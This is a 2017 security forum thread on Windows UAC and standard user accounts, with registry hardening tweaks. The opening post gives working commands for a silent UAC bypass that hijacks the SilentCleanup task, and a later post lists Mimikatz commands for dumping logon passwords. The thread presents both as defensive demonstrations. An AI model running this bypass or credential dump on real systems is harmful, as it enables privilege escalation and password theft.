User Account like a Castle

Discussion in 'General Security Discussions' started by Andy Ful, Jul 17, 2017.

  1. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    #1 Andy Ful, Jul 17, 2017
    Last edited by a moderator: Aug 24, 2017
    What is User Account with UAC? It is like a castle.
    Is the castle a security? It was in the medieval ages.
    What is Standard User Account (SUA) with UAC? It is a castle in the medieval ages.
    What is Administrator Account (AA) with UAC? What a stupid question. It is a castle in the 21st century!

    Why AA with UAC is not a security?
    1. Microsoft says, that UAC is not a security, but only a security component.
    2. Microsoft says the truth, AA with UAC can be easily bypassed in many ways.

    Remark.
    Microsoft officially says that UAC is not a security. I understand this official statement, as a statement about default UAC usage, which is mostly AA with UAC.

    Example (works only in Windows 8.1+).
    Run command prompt on AA as standard user and copy/execute the below commands:
    reg add HKCU\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM" /f
    schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
    reg delete hkcu\Environment /v windir /f
    echo "Finished"

    You can see the second command prompt window, running as administrator without UAC prompt!
    You can repeat this on SUA, and you will see that the second command prompt will be run as standard user!

    Can you make UAC more secure on AA? Yes.
    1. You can choose 'Always notify' UAC setting.
    2. You can use hidden UAC setting to elevate only executables that are signed and validated:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "ValidateAdminCodeSignatures"=dword:00000001

    But, even those secure settings will not prevent some UAC bypasses like from our Example.
    Those baypasses can be blocked when using some other methods like Software Restriction Policies, whitelisting, blocking some system executables (see Excubits Bouncer blacklist). For example, blocking 'reg.exe' will stop the bypass from our Example.

    Let's come back to medieval ages.
    Why SUA (with UAC as an integral security component) is a security boundary?
    1. It is recommended by Microsoft.
    2. It is a security boundary from the administrator standpoint (user does not know the administrator password).
    3. It is a security boundary, when preventing malware infections. Over 80% 0-day malware samples (including exploits) fail on SUA.

    Can you make SUA even more secure? Yes.
    You can use the same hardening settings as on AA, or disable elevation of privilege as a standard user, by the reg tweak:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "ConsentPromptBehaviorUser"=dword:00000000 ---> no elevation on SUA
    "ConsentPromptBehaviorUser"=dword:00000001 ---> prompt for administrator credentials on SUA

    See also the excelent articles about user accounts & UAC:
    Tyranid's Lair: Reading Your Way Around UAC (Part 1)
    Tyranid's Lair: Reading Your Way Around UAC (Part 2)
    Tyranid's Lair: Reading Your Way Around UAC (Part 3)
     
  2. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    #2 Andy Ful, Jul 17, 2017
    Last edited: Jul 17, 2017
    Something is wrong with my thread. I cannot post the full text because of an error. Please do not reply because 75% of text should be still added! The original text has some examples of commands, and this is probably the issue.

    Edit
    It is OK now. I had to add and next edit the commands in parts.
     
    AtlBo, askmark, Sunshine-boy and 3 others like this.
  3. Daniel Keller

    Daniel Keller Level 2

    Dec 28, 2016
    67
    195
    Germany
    Thank you very much for this post. It is very educating, as usual! :)
     
    AtlBo, askmark, Sunshine-boy and 4 others like this.
  4. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    Thanks for reading it, and the kind comment.:)
    This thread may be controversial for some forum members.
     
    frogboy, AtlBo, askmark and 5 others like this.
  5. Windows_Security

    Trusted

    Mar 13, 2016
    345
    1,614
    Holland
    Windows 7
  6. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    Yes, I know it, too.;)
     
    AtlBo, askmark, Solarlynx and 3 others like this.
  7. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    #7 Andy Ful, Aug 6, 2017
    Last edited: Aug 6, 2017
    I did not notice, that I made a terrible mistake. :confused:
    The right registry values should be as follows:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "ConsentPromptBehaviorUser"=dword:00000000 --> no elevation on SUA
    "ConsentPromptBehaviorUser"=dword:00000001 ---> prompt for administrator credentials on SUA

    I have a question to the Malwaretips forum Staff: Can I edit my first post to avoid misguiding the readers?
     
    AtlBo, askmark, Solarlynx and 4 others like this.
  8. SHvFl

    SHvFl Level 29
    Trusted

    Nov 19, 2014
    1,891
    13,926
    Supermodel for McDonald's
    Europe
    Windows 10
    Default-Deny
    Either annoy a few staff members this way @Umbra @Jack @BoraMurdar or report the post with what you want changed so they can do it when they check reports. I guess i did the annoying part but you can do the report method also if you wish.

    Btw if i use uac hardening #2 that you mentioned with uac at max level will MS stuff auto elevate like with uac normal level but without the security risk that comes with uac default level?
     
    AtlBo, askmark, Solarlynx and 4 others like this.
  9. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    Thanks for the correction to the Malwaretips Staff.:)
     
    AtlBo, askmark, Solarlynx and 4 others like this.
  10. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    Thanks for the help.:)
    If you meant the below hardening:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "ValidateAdminCodeSignatures"=dword:00000001
    then it is safe when considering actual MS stuff used by Windows system. But, I noticed that older versions of Microsoft not digitally signed executables, cannot be elevated with this hardening. For example the actual wscript.exe can be elevated, but wscript.exe from the older version cannot.
     
  11. rockstarrocks

    rockstarrocks Level 11

    Apr 16, 2017
    537
    4,111
    Civil Engineer
    Delhi>India>Asia>Earth>S.S.>Milky way>Our Universe
    Windows 10
    Isolation
    Wow, you almost described the UAC & SUA in layman's terms. Nice 'Castle' analogy. Thanks for the good read.
     
    AtlBo, askmark, Solarlynx and 5 others like this.
  12. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    #12 Andy Ful, Aug 7, 2017
    Last edited: Aug 7, 2017
    The one important question should be asked, too.
    Is there a way to execute applications with an elevation on 'SUA with no elevation tweak'?
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "ConsentPromptBehaviorUser"=dword:00000000 ---> no elevation on SUA

    If the execution is performed directly from SUA, then maybe it is possible, but I do not not how. If someone knows, please post the solution here.
    Yet, there is a known way to bypass no elevation tweak using programs, that can log on as administrator. For example, one can execute runas (Microsoft commandline tool) from SUA, log on as administrator using administrator credentials, and run (from Administrator Account) any application that requires elevation.
     
    AtlBo, askmark, Solarlynx and 2 others like this.
  13. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    One can harden the system, using additional credentials protection:
    ; Default value CachedLogonsCount = 10 must be changed to 0 (restart the system).
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "CachedLogonsCount"="0"
     
    AtlBo, TairikuOkami, askmark and 3 others like this.
  14. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    #14 Andy Ful, Aug 7, 2017
    Last edited: Aug 7, 2017
    The last question (maybe). How is it possible, that system scheduled tasks and Windows Updates can work, when the user is logged on 'no elevation SUA'?
    The answer is very simple. They do not use SUA, at all. For example, many scheduled tasks use Windows built-in 'NT\AUTHORITY\SYSTEM' account. So, it is also possible to create by the user, some scheduled tasks started as administrator. Those tasks may operate in the background (with administrative rights), when the user is logged on 'no elevation SUA'. Some applications (like Google Chrome) can use scheduled tasks to autoupdate with higher rights, and this works too, on 'no elevation SUA'.
     
  15. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    Some words about the CachedLogonsCount=0 setting:
    1. It is related to passwords in Active Directory Domains (AD Domains).
    2. The computer with Windows Home can be connected to AD Domain, so it can use folders, files, applications, and printers located anywhere on the network.
    3. The computer with Windows Pro (Ultimate) can be joined to AD Domain, so can be centrally managed using Group Policies and Active Directory.

    In home networks, using the AD Domain is an unusual solution. The standard Home networks use HomeGroup to share files and printers.
     
  16. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    #16 Andy Ful, Aug 11, 2017
    Last edited: Aug 11, 2017
    Recently, I tested Mimikatz. This is a well known hack-tool, often used for passwords harvesting. It seems, that most Mimikatz modules require administrative rights, so they will fail on SUA. One of those modules is Sekurlsa, that can extract passwords, keys, pin codes, tickets from the memory of LSASS. There is not well known, hardening reg tweak, for Windows 7 and Windows 8.0, that prevents the "clear-text" (reversibly encrypted plaintext) passwords from being placed in LSASS memory:
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest]
    "UseLogonCredential"=dword:00000000

    The above works only with hotfix KB2871997 (Microsoft Security Advisory 2871997).
    From Windows 8.1 this tweak is not necessary, because such "clear-text" passwords are not stored in memory. But, the simple registry modification: UseLogonCredential = 1, can be made by malware to force "clear-text" passwords to be stored in memory again (also in Windows 8.1 and Windows 10).
     
  17. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    Tested on Windows 8 32-bit in a virtual machine (one default admin account with password).
    Installed hotfix KB2871997. Mimikatz commands:
    privilege::debug
    sekurlsa::logonpasswords

    Without the reg tweak, Mimikatz showed my log-on password to admin account, under the wdigest position in Mimikatz console. After applying the reg tweak and logging-off/logging-on, Mimikatz showed the last log-on session with a (null) admin password under the wdigest position, and the previous log-on session with a visible admin password. So, Windows stopped writing "clear-text" log-on paswwords to memory, but did not clear the previous sessions from memory (system restart required).
     
    AtlBo, rockstarrocks and askmark like this.
  18. TairikuOkami

    TairikuOkami Level 4
    Content Creator

    May 13, 2017
    189
    623
    Postal Worker
    Slovakia
    Windows 10
    #18 TairikuOkami, Aug 13, 2017
    Last edited: Aug 13, 2017
    I am just dropping in to say thank you for "ValidateAdminCodeSignatures" and the rest. ;)
    I did not like it at first, since many exe do not work, but I have found a way around it using bat.

    Code:
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ValidateAdminCodeSignatures" /t REG_DWORD /d "0" /f
    start "" "E:\Software\Temp\Soft\Rapr.exe"
    start "" "E:\Software\Temp\Soft\UpdateTime.exe"
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ValidateAdminCodeSignatures" /t REG_DWORD /d "1" /f
     
    AtlBo, rockstarrocks and Andy Ful like this.
  19. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    It is a good and practical solution.:)
    Yet, some things should be remembered:
    1. When one of the applications, started in a batch, will hang the system, it will restart with ValidateAdminCodeSignatures = 0.
    2. The user cannot block execution of 'reg.exe'.
    3. The ValidateAdminCodeSignatures setting is especially strong on SUA. When using the local Administrator Account, every UAC bypass will also bypass this setting, so additional security is welcome, for example default deny solution.
     
    AtlBo likes this.
  20. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    The first notion about this reg tweak, I found in some of @Windows_Security (or @Kees1958) posts on Wilderssecurity forum, but it has a long story, back to 2006 year:
    [MS-GPSB]: User Account Control
     
    AtlBo likes this.
Loading...
Similar Threads Forum Date
Poll Do you use a Standard User Account (SUA)? General Security Discussions Aug 7, 2017
Poll Umbra's Poll Series : Standard User Account (SUA) General Security Discussions Jul 13, 2017
Video Review NotPetya and Standard User Account Video Reviews Jul 8, 2017